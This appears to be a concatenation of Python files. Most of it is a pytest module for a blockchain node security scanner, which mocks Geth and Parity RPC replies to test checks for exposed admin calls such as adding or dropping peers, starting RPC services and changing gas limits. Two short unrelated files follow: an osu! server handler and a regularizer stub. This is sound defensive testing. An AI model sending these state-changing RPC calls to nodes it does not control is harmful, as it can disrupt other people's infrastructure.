id="PeerCountStatus parity peer count equals",
),
pytest.param(
PeerCountStatus(minimum_peercount=1),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[],
id="PeerCountStatus parity peer count larger",
),
pytest.param(
PeerCountStatus(minimum_peercount=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[
Issue(
uuid=TEST_UUID,
title="Number of peers too low!",
description="Too few peers (current < minimum): 2 < 10",
severity=Severity.MEDIUM,
raw_data=2,
)
],
id="PeerCountStatus parity peer count smaller",
),
]
# PeerlistManipulation
TESTCASES += [
pytest.param(
PeerlistManipulation(test_enode="test"),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["admin_addPeer"],
[
Issue(
uuid=TEST_UUID,
title="Peer list manipulation",
description="Arbitrary peers can be added using the admin_addPeer RPC call.",
severity=Severity.HIGH,
raw_data=True,
)
],
id="PeerlistManipulation geth issue logged",
),
pytest.param(
PeerlistManipulation(test_enode="test"),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["admin_addPeer"],
[],
id="PeerlistManipulation geth no issue",
),
pytest.param(
PeerlistManipulation(test_enode="test"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_addReservedPeer"],
[
Issue(
uuid=TEST_UUID,
title="Peer list manipulation",
description="Reserved peers can be added to the node's peer list using the parity_addReservedPeer RPC call",
severity=Severity.HIGH,
raw_data=True,
)
],
id="PeerlistManipulation parity issue logged",
),
pytest.param(
PeerlistManipulation(test_enode="test"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_addReservedPeer"],
[],
id="PeerlistManipulation parity no issue",
),
pytest.param(
PeerlistManipulation(test_enode="test"),
NodeType.IPFS,
[],
[],
[],
id="PeerlistManipulation unknown node no issue",
),
]
# ParityDropPeers
TESTCASES += [
pytest.param(
ParityDropPeers(),
NodeType.GETH,
[],
[],
[],
id="ParityDropPeers geth skipped",
),
pytest.param(
ParityDropPeers(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_dropNonReservedPeers"],
[
Issue(
uuid=TEST_UUID,
title="Peer list manipulation",
description="Anyone can drop the non-reserved peerlist on the node using the parity_dropNonReservedPeers RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityDropPeers parity issue logged",
),
pytest.param(
ParityDropPeers(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_dropNonReservedPeers"],
[],
id="ParityDropPeers parity no issue",
),
]
# GethStartRPC
TESTCASES += [
pytest.param(
GethStartRPC(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["admin_startRPC"],
[
Issue(
uuid=TEST_UUID,
title="Admin RPC Start Rights",
description="The HTTP RPC service can be started using the admin_startRPC RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="GethStartRPC geth issue logged",
),
pytest.param(
GethStartRPC(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["admin_startRPC"],
[],
id="GethStartRPC geth no issue",
),
pytest.param(
GethStartRPC(),
NodeType.PARITY,
[],
[],
[],
id="GethStartRPC parity skipped no issue",
),
]
# GethStopRPC
TESTCASES += [
pytest.param(
GethStopRPC(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["admin_stopRPC"],
[
Issue(
uuid=TEST_UUID,
title="Admin RPC Stop Rights",
description="The HTTP RPC service can be stopped using the admin_stopRPC RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="GethStartRPC geth issue logged",
),
pytest.param(
GethStopRPC(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["admin_stopRPC"],
[],
id="GethStartRPC geth no issue",
),
pytest.param(
GethStopRPC(),
NodeType.PARITY,
[],
[],
[],
id="GethStartRPC parity skipped no issue",
),
]
# GethStartWebsocket
TESTCASES += [
pytest.param(
GethStartWebsocket(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["admin_startWS"],
[
Issue(
uuid=TEST_UUID,
title="Admin Websocket Start Rights",
description="The RPC Websocket service can be started using the admin_startWS RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="GethStartWebsocket geth issue logged",
),
pytest.param(
GethStartWebsocket(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["admin_startWS"],
[],
id="GethStartWebsocket geth no issue",
),
pytest.param(
GethStartWebsocket(),
NodeType.PARITY,
[],
[],
[],
id="GethStartWebsocket parity skipped no issue",
),
]
# GethStopWebsocket
TESTCASES += [
pytest.param(
GethStopWebsocket(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["admin_stopWS"],
[
Issue(
uuid=TEST_UUID,
title="Admin Websocket Stop Rights",
description="The RPC Websocket service can be stopped using the admin_stopWS RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="GethStopWebsocket geth issue logged",
),
pytest.param(
GethStopWebsocket(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["admin_stopWS"],
[],
id="GethStopWebsocket geth no issue",
),
pytest.param(
GethStopWebsocket(),
NodeType.PARITY,
[],
[],
[],
id="GethStopWebsocket parity skipped no issue",
),
]
# SHA3Consistency
TESTCASES += [
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
},
}
],
["web3_sha3"],
[],
id="SHA3Consistency geth no issue",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "lolnope",
},
}
],
["web3_sha3"],
[
Issue(
uuid=TEST_UUID,
title="SHA3 test failed",
description="Expected 0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad but received lolnope",
severity=Severity.CRITICAL,
raw_data="lolnope",
)
],
id="SHA3Consistency geth issue logged",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
},
}
],
["web3_sha3"],
[],
id="SHA3Consistency parity no issue",
),
pytest.param(
SHA3Consistency(
test_input="0x68656c6c6f20776f726c64",
test_output="0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad",
),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "lolnope",
},
}
],
["web3_sha3"],
[
Issue(
uuid=TEST_UUID,
title="SHA3 test failed",
description="Expected 0x47173285a8d7341e5e972fc677286384f802f8ef42a5ec5f03bbfa254cb01fad but received lolnope",
severity=Severity.CRITICAL,
raw_data="lolnope",
)
],
id="SHA3Consistency parity issue logged",
),
]
# NodeSync
TESTCASES += [
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1000",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth exact match and syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: False Block Number: 1000",
severity=Severity.NONE,
raw_data=False,
)
],
id="NodeSync geth exact match and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(995),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 995",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth in lower threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync geth below threshold but syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="The node's block number is stale and its not synchronizing. The node is stuck!",
severity=Severity.CRITICAL,
raw_data=False,
)
],
id="NodeSync geth below threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1000",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity exact match and syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: False Block Number: 1000",
severity=Severity.NONE,
raw_data=False,
)
],
id="NodeSync parity exact match and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(995),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 995",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity in lower threshold and not syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="Syncing: True Block Number: 1",
severity=Severity.NONE,
raw_data=True,
)
],
id="NodeSync parity below threshold but syncing",
),
pytest.param(
NodeSync(infura_url="https://infura", block_threshold=10),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1),
},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": hex(1000),
},
},
],
["eth_syncing", "eth_blockNumber", "eth_blockNumber"],
[
Issue(
uuid=TEST_UUID,
title="Synchronization Status",
description="The node's block number is stale and its not synchronizing. The node is stuck!",
severity=Severity.CRITICAL,
raw_data=False,
)
],
id="NodeSync parity below threshold and not syncing",
),
]
# ParityTxCeiling
TESTCASES += [
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setMaxTransactionGas"],
[
Issue(
uuid=TEST_UUID,
title="Transaction maximum gas can be changed",
description="Anyone can change the maximum transaction gas limit using the parity_setMaxTransactionGas RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityTxCeiling parity issue logged",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_setMaxTransactionGas"],
[],
id="ParityTxCeiling parity error",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setMaxTransactionGas"],
[],
id="ParityTxCeiling parity error",
),
pytest.param(
ParityTxCeiling(gas_limit=1000),
NodeType.GETH,
[],
[],
[],
id="ParityTxCeiling geth skipped",
),
]
# ParityMinGasPrice
TESTCASES += [
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setMinGasPrice"],
[
Issue(
uuid=TEST_UUID,
title="Transaction minimum gas can be changed",
description="Anyone can change the minimum transaction gas limit using the parity_setMinGasPrice RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityMinGasPrice parity issue logged",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["parity_setMinGasPrice"],
[],
id="ParityMinGasPrice parity error",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setMinGasPrice"],
[],
id="ParityMinGasPrice parity error",
),
pytest.param(
ParityMinGasPrice(gas_price=1000),
NodeType.GETH,
[],
[],
[],
id="ParityMinGasPrice geth skipped",
),
]
# TxPoolContent
TESTCASES += [
pytest.param(
TxPoolContent(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "txpool content stuff"},
}
],
["parity_pendingTransactions"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Content",
description=(
"Anyone can see the transaction pool contents using "
"the parity_pendingTransactions RPC call."
),
severity=Severity.LOW,
raw_data="txpool content stuff",
)
],
id="TxPoolContent parity issue logged",
),
pytest.param(
TxPoolContent(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "txpool content stuff"},
}
],
["txpool_content"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Content",
description="Anyone can see the transcation pool contents using the txpool_content RPC call.",
severity=Severity.LOW,
raw_data="txpool content stuff",
)
],
id="TxPoolContent geth issue logged",
),
pytest.param(
TxPoolContent(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_content"],
[],
id="TxPoolContent geth error",
),
pytest.param(
TxPoolContent(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_pendingTransactions"],
[],
id="TxPoolContent parity error",
),
pytest.param(
TxPoolContent(),
NodeType.IPFS,
[],
[],
[],
id="TxPoolContent unknown node",
),
]
# GethTxPoolInspection
TESTCASES += [
pytest.param(
GethTxPoolInspection(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool stuff",
},
}
],
["txpool_inspect"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Inspection",
description="Anyone can inspect the transaction pool using the txpool_inspect RPC call.",
severity=Severity.LOW,
raw_data="txpool stuff",
)
],
id="GethTxPoolInspection geth issue logged",
),
pytest.param(
GethTxPoolInspection(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_inspect"],
[],
id="GethTxPoolInspection geth no issue",
),
pytest.param(
GethTxPoolInspection(),
NodeType.PARITY,
[],
[],
[],
id="GethTxPoolInspection parity skipped no issue",
),
]
# GethTxPoolStatus
TESTCASES += [
pytest.param(
GethTxPoolStatus(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool stuff",
},
}
],
["txpool_status"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Status",
description="Anyone can see the transaction pool status using the txpool_status RPC call.",
severity=Severity.LOW,
raw_data="txpool stuff",
)
],
id="GethTxPoolStatus geth issue logged",
),
pytest.param(
GethTxPoolStatus(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["txpool_status"],
[],
id="GethTxPoolStatus geth no issue",
),
pytest.param(
GethTxPoolStatus(),
NodeType.PARITY,
[],
[],
[],
id="GethTxPoolStatus parity skipped no issue",
),
]
# ParityTxPoolStatistics
TESTCASES += [
pytest.param(
ParityTxPoolStatistics(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "txpool statistics",
},
}
],
["parity_pendingTransactionsStats"],
[
Issue(
uuid=TEST_UUID,
title="TxPool Statistics",
description="Anyone can see the transaction pool statistics using the parity_pendingTransactionsStats RPC call.",
severity=Severity.LOW,
raw_data="txpool statistics",
)
],
id="ParityTxPoolStatistics parity issue logged",
),
pytest.param(
ParityTxPoolStatistics(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_pendingTransactionsStats"],
[],
id="ParityTxPoolStatistics parity no issue",
),
pytest.param(
ParityTxPoolStatistics(),
NodeType.GETH,
[],
[],
[],
id="ParityTxPoolStatistics geth skipped no issue",
),
]
# ParityUpgrade
TESTCASES += [
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": {"upgrade": "stuff"},
},
}
],
["parity_upgradeReady"],
[
Issue(
uuid=TEST_UUID,
title="The node can be upgraded",
description=(
"A new node upgrade has been detected using "
"the parity_upgradeReady RPC call."
),
severity=Severity.CRITICAL,
raw_data={"upgrade": "stuff"},
)
],
id="ParityUpgrade parity issue logged",
),
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": None,
},
}
],
["parity_upgradeReady"],
[],
id="ParityUpgrade parity no issue",
),
pytest.param(
ParityUpgrade(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_upgradeReady"],
[],
id="ParityUpgrade parity no issue",
),
pytest.param(
ParityUpgrade(),
NodeType.GETH,
[],
[],
[],
id="ParityUpgrade geth skipped no issue",
),
]
# NodeVersion
TESTCASES += [
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {"tag_name": "v3.0.1"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity latest no issue",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {"tag_name": "v3.0.1"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
Issue(
uuid=TEST_UUID,
title="Node version out of date",
description="2.0.1 != 3.0.1",
severity=Severity.HIGH,
raw_data="OpenEthereum//v2.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity old issue logged",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
],
["web3_clientVersion"],
[],
id="NodeVersion parity error",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v1.9.23/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {"tag_name": "v1.9.23"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v1.9.23/darwin/go1.4.1",
),
],
id="NodeVersion geth latest no issue",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {"tag_name": "v1.9.23"}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
Issue(
uuid=TEST_UUID,
title="Node version out of date",
description="0.9.3 != 1.9.23",
severity=Severity.HIGH,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth old issue logged",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
],
["web3_clientVersion"],
[],
id="NodeVersion geth error",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "text": "rate limited"},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth github invalid JSON",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "Geth/v0.9.3/darwin/go1.4.1",
},
},
{"status_code": 200, "json": {}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="Geth/v0.9.3/darwin/go1.4.1",
),
],
id="NodeVersion geth github missing tag",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "text": "rate limited"},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity github invalid JSON",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
},
},
{"status_code": 200, "json": {}},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="OpenEthereum//v3.0.1-stable-8ca8089-20200601/x86_64-unknown-linux-gnu/rustc1.43.1",
),
],
id="NodeVersion parity github missing tag",
),
pytest.param(
NodeVersion(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "no valid version here",
},
},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="no valid version here",
),
],
id="NodeVersion geth no version found",
),
pytest.param(
NodeVersion(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "no valid version here",
},
},
],
["web3_clientVersion"],
[
Issue(
uuid=TEST_UUID,
title="NodeVersion",
description="The node surfaces it's version information",
severity=Severity.NONE,
raw_data="no valid version here",
),
],
id="NodeVersion parity no version found",
),
]
@pytest.mark.parametrize(
"plugin,node_type,rpc_results,rpc_methods,issues",
TESTCASES,
)
@patch(
target="teatime.reporting.issue.uuid4",
new=Mock(return_value=uuid.UUID(TEST_UUID)),
)
def test_issues(plugin, node_type, rpc_results, rpc_methods, issues):
context = Context(
target=TARGET,
report=Report(uuid=TEST_UUID, target=TARGET, issues=[]),
node_type=node_type,
)
with requests_mock.Mocker() as mock:
mock.request(
method=requests_mock.ANY,
url=requests_mock.ANY,
response_list=rpc_results,
)
plugin.run(context=context)
assert mock.call_count == len(rpc_results)
for i, response in enumerate(rpc_results):
if "api.github.com" in mock.request_history[i].url:
continue
assert mock.request_history[i].json()["method"] == rpc_methods[i]
assert context.report.meta == {plugin.__class__.__name__: True}
assert len(context.report.issues) == len(issues)
for i1, i2 in zip(context.report.issues, issues):
# compare dict representations here for more verbose failure diffs
assert i1.to_dict() == i2.to_dict()
|
from handlers.decorators import OsuEvent
from objects.constants.Modificators import Mods
from packets.OsuPacketID import OsuPacketID
from packets.Reader.PacketResolver import PacketResolver
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from objects.Player import Player
# client packet: 51, bancho response: update match
@OsuEvent.register_handler(OsuPacketID.Client_MatchChangeMods)
async def update_match_mods(packet_data: bytes, token: "Player"):
if not token.match:
return False
match = token.match
newMods = Mods(await PacketResolver.read_mods(packet_data))
await match.change_mods(newMods, token)
await match.update_match()
return True
|
import numpy as np
class GenericRegularizer:
def __init__(self):
pass
def pre_optim_update(self, layer):
pass
def post_optim_update(self, layer):
pass
class L1(GenericRegularizer):
def __init__(self, regularization_amount=1e-2):
self.regularization_amount = regularization_amount
